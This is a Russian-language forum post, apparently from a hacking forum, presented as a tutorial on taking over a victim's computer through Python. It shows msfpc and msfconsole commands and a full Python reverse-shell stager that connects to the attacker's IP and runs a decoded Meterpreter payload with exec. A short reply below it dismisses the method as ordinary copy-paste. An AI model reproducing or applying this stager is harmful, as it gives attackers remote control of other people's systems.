Здарсте, сегодня я научу проникать в любую ОС, главное условие должен быть установлен Python у жертвы Что нам нужно Metasploit Metasploit payload creator (msfpc) В кали линукс по умолчанию это есть. Для начала создаём вредоносный код с помощью утилиты Metasploit Payload Creartor msfpc python Code msfpc python тут выбираем наш айпи у меня к примеру 2 Немного ждем когда появиться вот это: пишем следущее: msfconsole -q -r '/home/kali/python-meterpreter-staged-reverse-tcp-443-py.rc' Code msfconsole -q -r '/home/kali/python-meterpreter-staged-reverse-tcp-443-py.rc' Потом жертва должна выполнить такой код на Python: import socket,zlib,base64,struct,time for x in range(10): try: s=socket.socket(2,socket.SOCK_STREAM) s.connect(('Ваш ip адресс',443)) break except: time.sleep(5) l=struct.unpack('>I',s.recv(4))[0] d=s.recv(l) while len(d)<l: d+=s.recv(l-len(d)) exec(zlib.decompress(base64.b64decode(d)),{'s':s}) Python import socket,zlib,base64,struct,time for x in range(10): try: s=socket.socket(2,socket.SOCK_STREAM) s.connect(('Ваш ip адресс',443)) break except: time.sleep(5) l=struct.unpack('>I',s.recv(4))[0] d=s.recv(l) while len(d)<l: d+=s.recv(l-len(d)) exec(zlib.decompress(base64.b64decode(d)),{'s':s}) И мы получаем сессию Meterpreter Ну а на этом мы закончим, всем пока.
В общем-то, обычный бэкконнект. На показанном примере будет работать только в локальной сети, т. к. ip не белый. Ну и я хз, что должно произойти, чтобы человек выполнил на устройстве такой код и еще держал сессию открытой))) Короче, хуета-копипаст.